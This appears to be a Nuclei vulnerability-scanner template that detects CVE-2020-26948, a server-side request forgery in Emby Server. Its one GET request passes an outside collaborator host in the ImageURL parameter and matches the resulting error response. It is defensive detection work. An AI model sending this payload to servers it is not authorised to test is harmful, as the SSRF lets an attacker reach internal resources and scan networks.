52 lines
1.7 KiB
YAML
52 lines
1.7 KiB
YAML
id: CVE-2020-26948
|
|
|
|
info:
|
|
name: Emby Server Server-Side Request Forgery
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: Emby Server before 4.5.0 allows server-side request forgery (SSRF) via the Items/RemoteSearch/Image ImageURL parameter.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to access internal resources, perform port scanning, and potentially pivot to other systems.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a patched version of Emby Server.
|
|
reference:
|
|
- https://github.com/btnz-k/emby_ssrf
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-26948
|
|
- https://github.com/btnz-k/emby_ssrf/blob/master/emby_scan.rb
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
- https://github.com/Live-Hack-CVE/CVE-2020-26948
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-26948
|
|
cwe-id: CWE-918
|
|
epss-score: 0.16155
|
|
epss-percentile: 0.955
|
|
cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: emby
|
|
product: emby
|
|
tags: cve2020,cve,emby,jellyfin,ssrf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Name or service not known"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/plain"
|
|
|
|
- type: status
|
|
status:
|
|
- 500
|
|
# digest: 4a0a00473045022100e9cf4aa4c7f738f741128c67d5869dde865fd6e3e537f53021b764e2d3fabeca0220098483185ba59a05d941a7002163bef067eed235167c38ee0e8b4b67ab097ee5:922c64590222798bb761d5b6d8e72950 |